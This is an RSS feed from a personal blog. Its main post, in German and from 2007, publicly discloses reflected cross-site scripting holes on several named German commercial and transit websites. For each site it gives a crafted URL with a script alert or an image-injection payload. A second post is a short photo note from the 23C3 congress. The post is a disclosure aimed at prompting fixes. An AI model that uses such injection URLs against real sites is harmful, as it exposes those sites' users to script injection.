<?xml version="1.0" encoding="utf-8"?>
<?xml-stylesheet type="text/xsl" href="../assets/xml/rss.xsl" media="all"?><rss version="2.0" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:atom="http://www.w3.org/2005/Atom"><channel><title>die-welt.net (Posts about 23c3)</title><link>https://www.die-welt.net/</link><description></description><atom:link href="https://www.die-welt.net/category/23c3.xml" rel="self" type="application/rss+xml"></atom:link><language>en</language><copyright>Contents © 2026 &lt;a href="mailto:evgeni@golov.de"&gt;evgeni&lt;/a&gt; </copyright><lastBuildDate>Tue, 21 Jul 2026 05:25:30 GMT</lastBuildDate><generator>Nikola (getnikola.com)</generator><docs>http://blogs.law.harvard.edu/tech/rss</docs><item><title>Warum man Geld für fähige Programmierer ausgeben sollte</title><link>https://www.die-welt.net/2007/01/warum_man_geld_fuer_faehige_programmierer_ausgeben_sollte/</link><dc:creator>evgeni</dc:creator><description>&lt;p&gt;Auf dem 23C3 in Berlin wurden einige interessante Hacks vorgestellt, und im Wiki tauchte eine kleine Liste auf, was wo wie exploitbar ist. Unter anderem waren auch ein paar wenige Cross-Site-Scripting Sachen dabei. Mich hat es etwas gewundert, dass es wirklich nur wenige waren, und da dachte ich mir, schaust du mal, was heutzutage noch so alles geht.&lt;br&gt;
&lt;br&gt;
Das Ergebnis war leider etwas erschreckend, unter den angreifbaren Seiten waren nicht nur namhafte Netzwerk-Hardware Hersteller, sondern auch der Verkehrsverbund-Rhein-Ruhr, die Gelben-Seten und Das Örtliche. Ich bin kein Black-Hat oder so, möchte die Lücken dennoch hier mal veröffentlichen um die Aufmerksamkeit der Medien ein wenig zu pushen.&lt;br&gt;
&lt;br&gt;
Hier also die Lücken:&lt;br&gt;
&lt;br&gt;
&lt;strong&gt;Netgear&lt;/strong&gt;&lt;br&gt;
Auf netgear.de kann man ganz einfach einen "bösen" Link bauen:&lt;br&gt;
&lt;a href="http://netgear.de/de/suche.html?q=%3Cscript%3Ealert('hallo')%3C/script%3E"&gt;http://netgear.de/de/suche.html?q=%3Cscript%3Ealert('hallo')%3C/script%3E&lt;/a&gt;&lt;br&gt;
Einfach als Such-Query etwas wie &lt;strong&gt;&amp;lt;script&amp;gt;...&amp;lt;/script&amp;gt;&lt;/strong&gt; eingeben.&lt;br&gt;
Netterweise geht das selbe auch auf netgear.com, obwohl deren Flash erstmal bei &amp;lt; im Query das Formular nicht abschicken will, aber wozu gibts Links?&lt;br&gt;
&lt;a href="http://netgear.com/Search.aspx?text=%3Cscript%3Ealert('a')%3C/script%3E"&gt;http://netgear.com/Search.aspx?text=%3Cscript%3Ealert('a')%3C/script%3E&lt;/a&gt;&lt;br&gt;
&lt;br&gt;
&lt;strong&gt;Saturn&lt;/strong&gt;&lt;br&gt;
saturn.de ist ganz schlau, man kann nur rein, wenn man ein Cookie gesetzt hat. Also kurz auf &lt;a href="http://www.saturn.de"&gt;http://www.saturn.de&lt;/a&gt; gehen, irgend eine Filiale ausswählen und...&lt;br&gt;
&lt;a href="http://www.saturn.de/frontend/offer/index.cfm?fa=prod_result_agr&amp;amp;prod_search_txt=%22%3E%3Cscript%3Ealert(%22a%22)%3C/script%3E"&gt;saturn.de&lt;/a&gt; den Link anklicken.&lt;br&gt;
Hier hat man wieder einen typischen Such-Fehler, aber man muss vor dem &amp;lt;script&amp;gt; ein &lt;strong&gt;"&amp;gt;&lt;/strong&gt; reinklatschen, damit das input-Feld zuende ist.&lt;br&gt;
&lt;br&gt;
&lt;strong&gt;Subway&lt;/strong&gt;&lt;br&gt;
Genau das Gleiche passiert auch auf der Seite von Subway, wenn man eine Filiale suchen möchte:&lt;br&gt;
&lt;a href="http://www.subway-sandwiches.de/index.php?id=572&amp;amp;swords=%22%3E%3Cscript%3Ealert(%22a%22)%3C/script%3E&amp;amp;search.x=0&amp;amp;search.y=0"&gt;subway-sandwiches.de&lt;/a&gt;&lt;br&gt;
&lt;br&gt;
&lt;strong&gt;VRR&lt;/strong&gt;&lt;br&gt;
Wer gerne Online den Fahrplan nachguckt, sollte vrr.de nicht vertrauen:&lt;br&gt;
&lt;a href="http://vrr.de/cgi-bin/search.pl?query=%22%3E%3Cscript%3Ealert(%22a%22)%3C/script%3Esearch_left=Suchen"&gt;vrr.de&lt;/a&gt;&lt;br&gt;
Wieder der selbe Fehler, der netterweise auch auf rheinbahn.de existiert.&lt;br&gt;
&lt;br&gt;
&lt;strong&gt;YellowMap&lt;/strong&gt;&lt;br&gt;
Den Weg zum 23C3 in Berlin findet man am besten mit yellowmap.de:&lt;br&gt;
&lt;a href="http://www.yellowmap.de/YM/Poi/Poi.aspx?Catchword=%22%3E%3Cimg%20src=%22http://events.ccc.de/congress/2006-mediawiki//skins/trustme/23c3-logo.png%22%3E"&gt;yellowmap.de&lt;/a&gt;&lt;br&gt;
Hier wollte ein Script irgendwie nicht, aber das Bild ist doch auch nett, oder?&lt;br&gt;
&lt;br&gt;
&lt;strong&gt;Das Örtliche&lt;/strong&gt;&lt;br&gt;
Suchmaschinen sind was feines, wenn man vor der Suche weiß, was sie finden:&lt;br&gt;
&lt;a href="http://www2.dasoertliche.de/?buc=&amp;amp;title=%3Cimg%20src=%22http://events.ccc.de/congress/2006-mediawiki//skins/trustme/23c3-logo.png%22%3E&amp;amp;page=0&amp;amp;context=0&amp;amp;verlNr=&amp;amp;verlName=&amp;amp;verlUrl=&amp;amp;verlServer=&amp;amp;la=de&amp;amp;cmd=cmd_nav_profile&amp;amp;form_name=meinoetb&amp;amp;action=3&amp;amp;la=de"&gt;dasoertliche.de&lt;/a&gt;&lt;br&gt;
Hier ist übrigens ausnahmsweise nicht die Suche schuld, sondern das dynamische erstellen des Seitentitels aus der URL.&lt;br&gt;
&lt;br&gt;
&lt;strong&gt;GelbeSeiten&lt;/strong&gt;&lt;br&gt;
Die Krönung war aber die Seite der GelbeSeiten, die Suchfelder für Was und Wo werden nämlich sauber nach "komischen" Zeichen gefiltert, aber die Suche in den Treffern ist angreifbar:&lt;br&gt;
&lt;a href="http://www1.gelbeseiten.de/yp/detailFilterAction.yp;jsessionid=1F9B1BE39A581F611AAF52A864AD87C4.gs1TomcatNode2?at=yp&amp;amp;location=berlin&amp;amp;subject=congress&amp;amp;subscriberLookupID=46575&amp;amp;tradeLookupID=46574&amp;amp;button=top&amp;amp;sortBy=&amp;amp;firstLetter=&amp;amp;tradeFilter=choice&amp;amp;functionFilter=choice&amp;amp;detailTop=%22%3E%3Cscript%3Ealert%28%27a%27%29%3C%2Fscript%3E"&gt;gelbeseiten.de&lt;/a&gt; (leider ist da eine SessionID drin, aber da kommt man bestimmt auch drumherum)&lt;br&gt;
&lt;br&gt;
Ich verstehe einfach nicht, wie man so fahrlässig handeln kann, werde aber gleich die Betreiber der Seiten und Heise Security mit einem Link zu diesem Beitrag beglücken und hoffen, sie lernen was daraus.&lt;/p&gt;</description><category>23c3</category><category>german</category><category>security</category><guid>https://www.die-welt.net/2007/01/warum_man_geld_fuer_faehige_programmierer_ausgeben_sollte/</guid><pubDate>Tue, 02 Jan 2007 17:25:48 GMT</pubDate></item><item><title>Bits from the 23C3 - Drones</title><link>https://www.die-welt.net/2006/12/bits_from_the_23c3_-_drones/</link><dc:creator>evgeni</dc:creator><description>&lt;p&gt;Sittin here in Saal 1 of the bcc in Berlin. You should know the 23C3 is goin on, and I have some nice shot just taken here at steinis presentation (erm, show ;-)) about drones.&lt;br&gt;
&lt;br&gt;
&lt;img src="https://www.die-welt.net/upload/ccc-drone.jpg" alt="/upload/ccc-drone.jpg"&gt;&lt;/p&gt;</description><category>23c3</category><category>english</category><guid>https://www.die-welt.net/2006/12/bits_from_the_23c3_-_drones/</guid><pubDate>Wed, 27 Dec 2006 17:49:22 GMT</pubDate></item></channel></rss>